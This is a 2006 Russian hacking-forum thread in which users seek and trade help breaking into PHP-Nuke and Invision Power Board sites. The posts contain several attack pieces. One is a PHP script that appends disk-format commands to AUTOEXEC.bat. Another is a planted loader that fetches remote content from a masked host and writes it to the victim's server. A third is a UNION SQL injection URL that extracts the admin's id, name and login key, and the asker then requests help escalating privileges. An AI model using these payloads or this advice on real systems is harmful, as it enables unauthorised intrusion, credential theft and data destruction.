Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
22.03.2006, 22:52
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257
Репутация:
103
|
|
php nuke срочно
Срочная помощь есть php nuke хз какой версии но эксплоит под создание админа пашет так вот как можно хакнуть его если Forums не работает как залить шелл поподробнее плз
В ПОИСК НЕ ПОСЫЛАТЬ НИЧЕГО НОРМАЛЬНОГО НЕ НАШЕЛ!
Вот скрин с админки php код в блок не записать незя!
http://rapidshare.de/files/16158700/clp38.jpg.html
Доступа к phpmyadmin нет!
СРОЧНО ПЛЗ! |
|
|
22.03.2006, 22:54
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961
Репутация:
1034
|
|
Ну через востановление БД шелл попробуй залить только я не поню в нюке такого нема без мода по моему....
|
|
|
|
22.03.2006, 23:12
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257
Репутация:
103
|
|
Сообщение от Nova
Ну через востановление БД шелл попробуй залить только я не поню в нюке такого нема без мода по моему....
Пожайлуста по подробнее )
|
|
|
|
22.03.2006, 23:15
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961
Репутация:
1034
|
|
Сообщение от KaMiKadZe
Пожайлуста по подробнее )
А кудауж подробней тами востановление Бд есть ? если есть пробуй через sql залить шелл...
|
|
|
|
22.03.2006, 23:58
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257
Репутация:
103
|
|
Сообщение от Nova
А кудауж подробней тами востановление Бд есть ? если есть пробуй через sql залить шелл...
Неа чего то не нашел тока DUMP БД но щас думаю о другом сразу формат С и Д вот таким скриптом ))
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c:\q format /n format d:\q";
fputs($file,$str);
fclose($file);
?>
|
|
|
|
23.03.2006, 00:08
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961
Репутация:
1034
|
|
Сообщение от KaMiKadZe
Неа чего то не нашел тока DUMP БД но щас думаю о другом сразу формат С и Д вот таким скриптом ))
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c:\q format /n format d:\q";
fputs($file,$str);
fclose($file);
?>
Ну ты реально ламер тогда если так думаеш у меня слов нет всё здесь постить больше не буду.....
|
|
|
|
23.03.2006, 09:01
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257
Репутация:
103
|
|
Сообщение от Nova
Ну ты реально ламер тогда если так думаеш у меня слов нет всё здесь постить больше не буду.....
хех несмеши )
сначало я встроил в сайт скрипт
Код:
<?php
$link = 'http://*******/txt.txt';
$link2 = 'format.php'; //init file address
$file = fopen($link, "r");
$rf = fread($file, 100000);
if ($rf) { echo ""; }
else { echo " "; } //read data of source
echo "< Br>";
$file2 = fopen($link2, "w"); //Copy data in exit_file
if (fputs($file2 , $rf, 100000)) { echo " "; }
else { echo ""; }
echo "Done!";
fclose($file2);
?>
Потом админ заходи к себе на сайт и у него это копируется файл на сервер дальше я внедряю format.php
Код:
<?
$file=fopen("C:\AUTOEXEC.bat","a++");
$str="@echo off /n format c: /q format /n format d: /q";
fputs($file,$str);
fclose($file);
?>
PHP символы не принимает тока простые так значит ссылку и все больше мне от него и его пользователей ничего не надо)
|
|
|
|
23.03.2006, 09:22
|
|
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433
Репутация:
661
|
|
AUTOEXEC.bat ета внатуре крута  Об остальном ваще промолчу
зы: ех жаль до репы твоей добраться не могу  |
|
|
|
23.03.2006, 13:40
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257
Репутация:
103
|
|
Ладно я понел свою ошибку теперь немогу понять другого вот этим кодом я вывожу в отправку поста инфу о админе
Код:
h**p://***********/forum/upload/index.php?&act=Post&CODE=02&f=61&t=7897&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key,char(58)mgroup),1,1,1,1,1,1,1,1,1%20from%20ibf2_members%20WHERE%20id=1%20/*
Ну вот вывел теперь решил найти столбец где соль установил IPB 2.0.3 и немогу найти там такого столбца в members нет там такого но ладно решил иди SQL инъекцией но невышло подскажите как граматно сделать обновление IPF2_MEMBERS столбец mgroup просто никак немогу догадаться все мысли свои по поводу этого прошу выложить) |
|
|
|
23.03.2006, 22:31
|
|
Участник форума
Регистрация: 24.02.2006
Сообщений: 206
Провел на форуме:
2735257
Репутация:
103
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
